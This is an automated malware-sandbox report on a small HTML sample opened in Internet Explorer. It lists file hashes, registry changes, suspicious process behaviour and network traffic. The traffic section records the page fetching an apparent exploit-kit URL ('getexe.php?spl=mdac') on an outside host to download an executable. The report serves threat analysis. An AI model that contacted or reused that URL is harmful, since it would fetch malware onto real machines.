Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
27/06/2024, 17:58 UTC
Static task
static1
Behavioral task
behavioral1
Sample
16f4790b77734d204b10b96d3cdf48d7_JaffaCakes118.html
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
16f4790b77734d204b10b96d3cdf48d7_JaffaCakes118.html
Resource
win10v2004-20240611-en
General
-
Target
16f4790b77734d204b10b96d3cdf48d7_JaffaCakes118.html
-
Size
105B
-
MD5
16f4790b77734d204b10b96d3cdf48d7
-
SHA1
9f082e1192e43f25ce15c6a9a04cfd5dbfd3bd64
-
SHA256
033ae2b2364c971f1e125a5d38b52da0bd6181d7e2b5ded3930a49ec744dcfb8
-
SHA512
6f51c44576880dfffce167de6fa06d75e65af103b01758fb299aa18db677827d5b5ea9bb5d3f4d78a085d59cbca3f8154d5bfdd8734f089d6b36718071f91496
Malware Config
Signatures
-
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000b2968c6cf60b74b94229c882944fb81000000000200000000001066000000010000200000004469f43b671813598da71a384542c192d0bc8dfaf40b8d5fd6a26264c84810b7000000000e8000000002000020000000a767eca2abf17a3a0f486046e6af1b0ad36ba2f7cdafc78015599eec2a7b6ee0200000000211332f5eec057e430a9dc14744cc6bf4605043ecdc40e85786029e7f107da840000000e57394bec2ecdcf6627943e305661925d893e7bc91c88beabfea5e0a9f4a949328cb687b98be683c907881d719e95a4875543ca9e6cc7dea3e904c58a38848e0 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20a1d29cbbc8da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000b2968c6cf60b74b94229c882944fb8100000000020000000000106600000001000020000000862b36c42b2b7e488b4361d3bd70d9acb66fca7f45f37eb7c604871a9be0d52c000000000e80000000020000200000003b6557a346f1f5ff90bf92c3b60184a78cbc08c940b1fff5782ebcc3ab4abbe290000000d2782ec934a310df5e9516024b18748284838aca4bc919146bd26c6f58fdd6894ea06f58886720964326bc9f6abb8fc3bd161ddbe74cd4640560fb73cac1361586e572d98292736351b97e635954a9ea941636c072cb66cf612da1758e5ebdd279e1282d302ee23dc76edc1d1091dc4271581038e76812ebb63d8b8dd0e8f69027b13ee756923fdd5558ea8fcf7d05f240000000658ef617a6bef38f96d2624fb36060d962fe787f7a3e9b6b93881491128efbf63fb80bb0a72b89856b6eed59e2cb822f9140ceb92bf632a31974ffbdf8c382d3 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CE659B71-34AE-11EF-86AF-C63262D56B5F} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425672958" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 772 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 772 iexplore.exe 772 iexplore.exe 2488 IEXPLORE.EXE 2488 IEXPLORE.EXE 2488 IEXPLORE.EXE 2488 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 772 wrote to memory of 2488 772 iexplore.exe 28 PID 772 wrote to memory of 2488 772 iexplore.exe 28 PID 772 wrote to memory of 2488 772 iexplore.exe 28 PID 772 wrote to memory of 2488 772 iexplore.exe 28
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\16f4790b77734d204b10b96d3cdf48d7_JaffaCakes118.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:772 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2488
-
Network
-
Remote address:8.8.8.8:53Requestlimon4ik.co.ccIN AResponselimon4ik.co.ccIN A175.126.123.219
-
Remote address:175.126.123.219:80RequestGET /eleon/getexe.php?spl=mdac HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: limon4ik.co.cc
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Location: https://limon4ik.co.cc/eleon/getexe.php?spl=mdac
Content-Length: 256
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:175.126.123.219:443RequestGET /eleon/getexe.php?spl=mdac HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: limon4ik.co.cc
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.29
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-
1.1kB 689 B 11 4
HTTP Request
GET http://limon4ik.co.cc/eleon/getexe.php?spl=mdacHTTP Response
301 -
152 B 3
-
1.2kB 5.9kB 13 11
HTTP Request
GET https://limon4ik.co.cc/eleon/getexe.php?spl=mdacHTTP Response
404 -
296 B 136 B 6 3
-
1.2kB 7.7kB 12 12
-
999 B 7.7kB 11 12
-
831 B 7.7kB 10 12
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD568472fca4e3d3982b8f8379a4b0d14ef
SHA11b462f0541cf967ff54c15cb3f0be2ed64923acc
SHA256f62820b646ff2812be40512c3a11639674e84f01f366d2600c8350fd3ef9f528
SHA5123a6d0e0e9aba6681d0e5b1f678c2db93a972c95b1bb49f7128fbe6f912189bd27332ab73a7f44f77adfe592b2045028de06819cfe70dd1eaff54ddd883140515
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52a522ee9f9454e180da3f9ab0130942f
SHA1603ba092831ce645fd601c11987a4d95a3128259
SHA2563f29d9ca0c0e49755a31e301ef6444dd0241a49cedb4f05cb84113db26d2982f
SHA512f4063837499488fa4cf2fea6f384d9aba484a2db232eb15c4296d01ce82b7ba51b85fc56bf96dac52cfe1411cfdd4b5b220f62d76e8247c5eea80a1af64690a9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD53e5bfba06f7e1b3ae4c39eb1e7d1eec0
SHA148e644f74723a8d2a71af6796e4bd35813ef9caa
SHA2566a4da3e610dcd3b563ab7d6b25d8c21270361611241251017afc33fe3c03c9a3
SHA512b7319d8f27f9859a85c650f72a0f6fa13106d96d7c7c050b8e97032d6e53017491222cfb5d64be8b59d9e538f489815d99959ec289da130fde1eed8febc92741
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5298f29444e6c435fcb451a5760e1c3f3
SHA14d45f4cf7e7dec4f1675a7096fe09a32a558d329
SHA2565a34b6930b541816c204acada2cabe98f0f57a9692628503e17b8a1ad002ba34
SHA512c560eb57e2e4b4cfb25d8a1fdcfacd0ecba13516814ad64c9005af0f36dbb05dd1f81c61540f7e35f43b473d50a66b3e2720c16729b7195708fc5c28a50e0099
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ddd29499f5486bb5ad444961c5a8fb0e
SHA12e62e4fb6cf8c3a8c1c557c28e7583f618e27beb
SHA2566492954d2534365d52bedc6edc80cac21030c76c8586d968d2c9eeb4c9fde3c6
SHA512911fb7c88ff4f2aa0834179f20b583fd769fb4f58b5676493133bcb4d579a7a2c4005fd03e0ad18697a3499f6dc99ea38ca9329b3a05420c626ce8f49adc34f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54195be156be4eea5e17b324e3f545c64
SHA1c6862399289e0debdfd2228384f316dafa3ba812
SHA256741e0d698a6436e0c07c1d756ece535cc9c5a506a8a2de9f22f2a6295bdddc68
SHA512705937e4a31c5e81ba5deb87277a99e80a3c641ebc09bd8b737e5fb95242e368cf7b6d075af9faabf153c5079c72e721db3bb8adfa279388d27a6f1487785992
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59b3e781e757604959aa5e7adcfd4616f
SHA183693005d3d19ebc9404d430c4f7b10bb6dabc98
SHA25633d8c3457120b42e26e593230015e6c7c6c7d574675a407408e5a07de4033ee8
SHA512752350713eb99a7506dce6b4bb9b453b6d92b1aa1528f738af261cc148372f8d4509f74e1a6250c9111d74c53fc58666f5494d9c2c3591d4c59853c75672116e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e2815af964b07dd8bef3150e5816423d
SHA1b927b7fa678005290ca13ca460898985ae645073
SHA256e8f2e8161ab2706381d78126e3ff26908d8638b059a82f27d690366e3eeac299
SHA512b602ab25b7fe02c00cea43c57bd8f55d79a0844445eec92fc51be419374b18c8e03c5b4ca235ea27a5bc3112aa662295a80694d3d34c24c532ba78f339d28583
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD543bad1ebf1a45bf7ba1f8265aa7dee7e
SHA1a2697675bc3db67fddd9c24fff18da80e19ba46a
SHA25605c97ea2c5de138e67a186a9c4ee2cededdaf08ea865abec5143047e6e76f57e
SHA5126a8718f7ac69e2360c91d48af1e5595d39077844b65f8d996f321e3fcf9d7168cded3482349483b063c46a36da7c4ad984633a33ff6631dfe8307824ab56f42d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f3f357a895afc6ed57b52904e4712677
SHA11d7dd27927e45fdd84a6ad7475374bfbeb1298bd
SHA256cda75f8dac7fd6b02ac70436389cfa8934f85c65e74ee12f44b263057fd3d94a
SHA5122bc2cc44edfde5e8af947f15b8f34d775b70d2818148029a7044982788d62d2399b532ca79d9a09e6d508810609739b68304b7429414f072f9faea41fa3c1e1c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD562c6dcf0cec6e01071b8ba81825d087e
SHA16653899973645740118de68d112b439b4af79f8a
SHA256347bf3405d00b162439dd4d6a9bda61c7d38ac41014d48d7aefd360d64feeabd
SHA51200c4780d998e98751c0e116894b6b131e0abf26a0fb95f380420c485bbb7737818ba07e58e8117607ead8914eb226cdbe9a007503fcf1e622828751f1a0d854d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52982843034da87a09e8b8dc815a07714
SHA1d1917e6691ef60aa33daceb7cdfd2ec91d485431
SHA256d240ff0c0feb5e32c8bc0e552cd4861b0a2211709941cfe68558c0ecda9b7c9b
SHA51219e49eb574653253e2400c95a4ab755d6b7c4ecf5f094d081a93587f5680b2e1d35211475d5c00fa84ac00a610c335182fb1643b79bd03599ad9396138562d84
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58b94e997d62e76c4bc8a05970fd426c6
SHA1e39db79a1b13589c2cc17dafbf80d3732584319f
SHA256d3d17fad2153d7c3198d75c1172e4c808def92d49784e67cdba510eb2ab10363
SHA512d548ed05dd1b68f33a71dde03606b03b71db11f13f9442a2fabe6356aa07e8d417fad5f3d6dfcfbafe384e2599b9e0b628733940e33db81b0be9472cb1266ba3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD509dbe74bfcdc702fdb5703b4d4e178d0
SHA1a0b244c6fc861f00d0e1aa80a67a2723fac8fcb3
SHA25683d7990071882f5049995653bf74d7816988ad3ab06a856788c18d265e10a326
SHA512ca6cfd7f874fee2e7e8ccfbd4f87dd78d252d0fe5753dc6a36d1bc20b01b9fab86c1eed7c30fc949e152ecaa5262b4280bd6f508cdbb4b7169093fa5add0fba3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5aaf35e211fa505eb0b302a97e8023e1d
SHA149e792bd0174dc91adddc5f385a46ee6cdd143e6
SHA25689c168a9b68fbc6d436fc7ec17be57367385029dfcbf543c7bfb5342ef5dbe07
SHA512e1edaea88346bc21e0ab3069db4291a41fa4cb81c83a285fff7efbcdbf49da15c27a7d5aac9b97699468a4f60e42359e24cc2d9c537d6fa3e15e635ecfbe228c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51e7a34364e12ddc01e1fc1332a0f243e
SHA1c7dea5182acd4fc9419f94c2c1adbf6ab833b5cb
SHA25663ffabe0f10d606b9ab611dedde11c3cd97e5c691058c78983a2e185478728e3
SHA51296388ac5e318fff5dcafd5b3ebdf531f94be779a39bc9c496f841ed623727d96d07b97a0d6405879f24987709120fdc0e1f5f3c7c21cb876b5e9a47f1d913e1d
-
Filesize
67KB
MD52d3dcf90f6c99f47e7593ea250c9e749
SHA151be82be4a272669983313565b4940d4b1385237
SHA2568714e7be9f9b6de26673d9d09bd4c9f41b1b27ae10b1d56a7ad83abd7430ebd4
SHA5129c11dd7d448ffebe2167acde37be77d42175edacf5aaf6fb31d3bdfe6bb1f63f5fdbc9a0a2125ed9d5ce0529b6b548818c8021532e1ea6b324717cc9bec0aaa5
-
Filesize
160KB
MD57186ad693b8ad9444401bd9bcd2217c2
SHA15c28ca10a650f6026b0df4737078fa4197f3bac1
SHA2569a71fa0cb44aa51412b16a0bf83a275977ba4e807d022f78364338b99b3a3eed
SHA512135be0e6370fd057762c56149526f46bf6a62fb65ef5b3b26ae01fa07b4c4e37188e203bd3812f31e260ec5cccff5924633dd55ab17e9fa106479783c2fb212b